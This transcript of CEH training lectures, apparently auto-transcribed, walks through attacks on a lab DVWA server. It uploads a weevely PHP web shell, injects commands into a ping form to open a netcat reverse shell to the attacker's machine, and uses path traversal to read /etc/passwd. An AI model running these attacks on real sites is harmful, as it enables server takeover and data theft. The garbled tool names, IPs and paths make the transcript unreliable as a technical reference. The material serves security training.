EC Council CEH 312-50 V11 – Website Hacking – File Upload, Code Execution & File Inclusion Vulns part 1
- Discovering & Exploiting File Upload Vulnerabilities To Hack Websites
In this lecture we’re going to have a look on file upload vulnerabilities. These are the simplest type of vulnerabilities because they allow us to upload any type of file. So for example, if the target computer can understand PHP, then we can upload any PHP file or a PHP shell and get full control over the target computer. Now if the target or the target server understands Python or any other language, then you can just upload Python code, python shell or Ruby shell. You can create these shells using Ville Evasion or Metasploit, or you can use your own PHP or Python shell. What we’re going to do today, we’re going to have a look on a tool called Weebly that generates PHP shells and allow us to gain access and do a number of cool things on the target computer.
So, first of all, I have my Dvwa here, and usually when you’re trying to pen test the website, what I recommend is, before trying to use any tools or anything, after you do your information gathering is you just go in and try to browse the website, see what you can see. Just get a feel of the website, see what’s installed on it and all that, and try to exploit any features you see. So for example, let’s say you went on everything and then you reached the upload. We can see that this website allow us to upload a file. Now this sometimes in your penetration testing tasks, it could be a website that’s allowing you to upload a profile picture. A picture. If it’s a classified website, maybe it’s allowing you to upload pictures of cars or whatever you’re trying to add in the website.
So as you can see here, the website expects you to choose an image and upload an image. So let’s see if we can upload an image first. So I’m going to go on my downloads and I have a picture here in the resources, just a picture of a car. I’m going to upload it and see if it gets uploaded. And we can see that the upload was successful and it stored in this particular location. So it’s dot, dot, dot, dot, which is, which means two directories back and then this file name. So let’s see if the picture has actually been uploaded. So I’m taking away two directories, I’m taking away the vulnerabilities and upload. I’m only using that. And then we’re going to get this location on the server just to see if the picture was uploaded properly. And as we can see, the picture has been uploaded.
So that’s all good. Now the next thing we want to do, let’s try and upload a PHP file. And to do that we’re going to use a tool called Weebly, as I said, to create a payload or a shell if you want to call it, and it’s obviously going to be a PHP shell. You can use Metasploit, as I said, to create a PHP payload, but we’re going to be just having a look on a different tool that’s designed for web application penetration testing. So the tool is very easy. We’re going to put the tool name which is weebly, and then we’re going to put generate because we want to generate a payload or a shell file, then we will put a password for that file so that only us can access it and control the website when we upload it to the website.
So my password is going to be 123456 and then I’m going to say what I want to store it and I want to store it in root and I’m going to call it shell PHP. So very simple. Weebly is the name of the program generated to generate a shell, the password that the shell is going to authenticate us with and it’s going to be stored in root shell PHP. I’m going to hit enter and it’s created. Now I’m already in my root, so if I just do LS, I should see it and we can see it right here. So the next thing is we’re just going to go back to our website and try to upload that shell. And I’m going to look for shell and here it is, going to hit on upload. And as you can see now, it’s telling me the file has been uploaded successfully and it’s in the same place that the picture was.
So all we need to do now is we’re going to use the same link and we’re going to use Weebly again to interact with that shell that we uploaded. Now let’s first of all see if the shell exists and it’s been uploaded properly. So I’m just going to browse it through my browser, shell PHP, and you can see that you get a blank page. So we’re not getting 404 file not found, which means that the file has been uploaded and it’s there. So we’re going to try to interact with it from Weebly to connect to it. We’re going to type in weavey and then we’re going to put DRL where the shell is. So this is where our shell has been uploaded and then we’re going to put the password.
So my password was 123456, very simple, weebly, the URL where the file is and 123456. This is very similar to when you use your multi handler, waiting for connections are connected to your backdoor. So we’re literally just going to connect to the back door that we uploaded. And as you can see now we’re in the file system. So from Weebly, from this place you can actually just type in any Linux command and it will be executed on the target computer and you’ll see the result here. So if I do a PWD, you’ll see that I’m invited www hackable uploads and if I do an ID, I’ll see my user at the moment which is www data. And if you do, you name a just to confirm that this is the Metasploitable machine.
You’ll see that this is the Linux Metasploitable machine. Now we can do anything we want. We can list the files, we can navigate. You can do any Linux command that you want to do. Now we have changed. Our place has been changed. Weebly also offers much more features than just this. So it actually allows you to do a number of cool things. If you type in Help, you’ll see all the cool stuff that you can do with Weebly. So you can try to escalate your privileges, execute SQL queries and a lot of cool stuff that is just designed for web application penetration testing. For now, I’m going to leave it at this. And this just shows you how to use file upload vulnerabilities.
- Discovering & Exploiting Code Execution Vulnerabilities To Hack Websites
Code execution vulnerabilities these type of vulnerabilities allow us to execute operating system code on the target server. So if the target server uses Windows, we’ll be able to execute Windows commands. If it uses Linux, then we’ll be able to use Linux commands. Clearly this is a really critical problem that would allow us to do anything we want with the target, really, we can upload a PHP shell using a Wget command or upload a payload, a virus, anything we want using the W get Linux command. You just need to make sure that you’re uploading it to a file or to a directory which you’re allowed to write stuff to.
Another way of exploiting this vulnerability is to just run OS commands and get a reverse shell based on these commands. So because we can run operating system commands, we can use the programming languages supported by that operating system to try and get a reverse connection on our computer. So first of all, let’s just assume that we’re browsing here and we managed, we were going around and then we got to a tab in the website where it allows you to, for example, do a ping. Now what you should do is you should always try to experiment with any input box you see, try to see what that input box does and what can you inject into it, what can you do to get stuff running? So, for example, this input box is telling you it’s going to do a ping.
And if you put an IP, for example, I’m going to put 1020 14 203, which is my own IP, just to use it as a normal person. And I’m going to do a submit and it’s going to go ahead and ping it for me and give me the ping results. So what looks like here it’s actually executing the pink command in Linux systems. Now let’s see if we can exploit that if it’s actually executing the pink command. So what it’s doing is it’s going and it’s doing so we’re sending 1020 14 to three as the pink and then it’s going to the web server and the web server is doing ping 1020 14 to three. So let’s see if we can exploit this. How would we exploit it if it’s taken what we’re inputting right here and then it’s due and ping that.
Now in Linux and Unix based commands you can use this sign to execute multiple commands on one line. So if you do this, for example, in your own terminal so I’m just going to go to my terminal here and I’m just going to do LS which is the list command and then PWD is what shows your working directory. So if I do an LS followed by this sign and then do PWD, it’ll execute both commands so it will do this and then it’ll show where the working directory is so we can do the same thing with this and see if it works for us. So we’re going to put an IP, a write IP, and then I’m just going to do PWD and see if it’ll execute the PWD for me. If it does, then this is a code execution vulnerability and I can execute anything I want on the server.
So let’s see what’s going to happen. I pasted this and I’m going to hit submit. And as you can see we got the ping results, but at the end we got our current working directory. So it’s varwdvwa vulnerability is in exec. So it executed the PWD that I inserted. And that means I can insert any commands I want in there and they’ll be executed. So I’ve inserted a resources file that you can use to get reverse connection from the target computer. Now there’s a number of ways, a number of commands that would give you a reverse connection. All of these commands depend on the programming language. So for example, we have commands and PHP, we have commands in Ruby, you have Perl commands and we have the one for bash.
Bash is the Linux shell command language. So all Unix operating systems will be able to execute bash commands. So that’s a very good way of doing it. So most Unix system, this command should work on most Unix based systems. So this would be a really good way of doing it. Again, most of them would have python, so Python would be a good way. Netcat, most of them do have netcat as well. So netcat is a good way of doing that. And we’re actually going to use netcat in this video. So what I’m going to do is first I’m going to listen for connections, just like we used to do with metasploit, when we used to do multi handler.
You can actually use a multi handler for this and listen for connections, but I’m just going to keep it simpler and show you a new way and I’m going to use netcat. So netcat, netcat is just a tool that allows you to listen and connect computers together. So I’m going to listen on port 8080. So Netcat is the program VV is just to see verbal output, so we can see a lot of output. Anything goes wrong, we can see it. And we’re telling it to listen using the L option on port 80, 80. So I’m going to hit enter and that’s saying it’s just listening on port 80, 80. That’s all it’s going to do.
The next command we’re going to do is we’re going to try to connect from the web server back to my computer using netcat as well. So we’re assuming the web server has netcat. We’re going to try it and see if that works. So the command is very simple, it’s netcat and we’re telling it to use bin bash. And we’re giving it the IP of my device, my attacker device, which is 1020 14, and then the port which is 1880, which is we’re listening on right here. So I’m going to copy that and I’m just going to execute it the same way we used to execute the PWD command. So the last thing we did was 1020 14 203 and then we did PWD.
So what I’m going to do now, I’m going to remove the PWD and paste the code that we just created, which will try to connect from the web server back to the cali machine, to the attacker machine. And I’m going to come here and as you can see, we got a connection back from two to us, from 1020 14 to four. So that’s the target computer. And if we do a PWD, you’ll see that we have a reverse shell. If we do an LS, if we do an ID, you’ll see that we’re Www data. And if we do a U, name A just to confirm that I’m in the metasploitable and you can see that I’m in the meter exploitable and I’m able to run any command that I want on the target computer. So basically I have full access to the target computer.
- Discovering & Exploiting Local File Inclusion Vulnerabilities
Local file inclusion vulnerabilities. These exploits or vulnerabilities allow you to read any file that is within the same server. So even if the file exists outside the varw, you’ll be able to read it and read info with it. Now why this vulnerability is critical, because you can can read any files. So if the users are storing some sort of important files or password files, then you’ll be able to read them and then from there you can further exploit your target. Also if there is a number of websites on the same server and you manage to find this on a website that you’re not targeting, then you might be able to access files related to the website that you’re targeting and then further exploit your website from there.
So let’s have a look on this. And also the way we’re going to be exploiting this vulnerability is through the URL. So usually in our code execution example, we were writing the code in here. Now sometimes you might find the code vulnerability in the URL, so it’ll be something like CMD and then you put the command, or for example in this case it would be IP equals to the IP. For example, 1020, 14, two, three, and then you put design and then you put your PWD after it, for example, because our example was just in the text box. Same is going to happen here in our file inclusion vulnerability. So we can see that when you’re in here in this URL, it’s saying that this file is going to take a page and it’s loading something called include PHP.
So it looks like it’s actually loading another page, like this current page is loading another page called include PHP. So again you’d be browsing the web server and trying to get a feel of it and you see something like this, or you see something called IP equals the IP and then you know that there’s a ping, for example, for the previous video. So for this that we know that our tag is trying to open a file and the file is called include PHP. Let’s see if there is actually a file called include PHP. So I’m just going to remove everything here and try to access include PHP directly. And as we can see, we actually do have a file called include PHP. It’s not running properly but it exists and it’s in the same working directory.
So let’s try and see if we can read a file that is stored in the computer. And we’re going to use a file called etc password, so that’s the file which contains all the users and their path is on the current web server. So let’s have a look on this. So etc. This file contains all the users for the current operating system. So if I just go on my Caddy right here, and if I run it here, if I just do cat etc password, you’ll see all the users that I have on the current computer and their default path on the current operating system. So we’re going to try to read this file and to do that, let’s go back and see our current location. So our current location is in the fi file, in the fi directory. So we need to go back 12345 times and then go to etc password.
So going back would be done using the dot and let’s try and do that. So at the moment we’re accessing this current file and just to make it easier for you, actually, let’s just put the full path right here. So on the page it’s trying to access this page. So what we need, we actually want a place called etc password. So we need to go back five times for these directories. So this one is going to be let’s start them from here. So we’re going back and then we’re going to go to etc password. And as you can see now we have the output of the etc password file. We can copy that and store this here and then you’ll be able to read it and just get more information about the websites that you’re targeting right now. Again, you can use this to try to access different files, sensitive files or files of other websites on the same server.